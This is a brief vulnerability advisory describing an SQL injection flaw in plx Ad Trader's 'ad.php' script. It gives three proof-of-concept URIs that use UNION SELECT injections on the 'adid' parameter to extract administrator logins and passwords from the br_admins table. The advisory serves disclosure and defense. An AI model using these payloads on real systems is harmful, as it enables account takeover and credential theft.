|
plx Ad Trader 'ad.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins-- http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins-- |
|
|
Privacy Statement |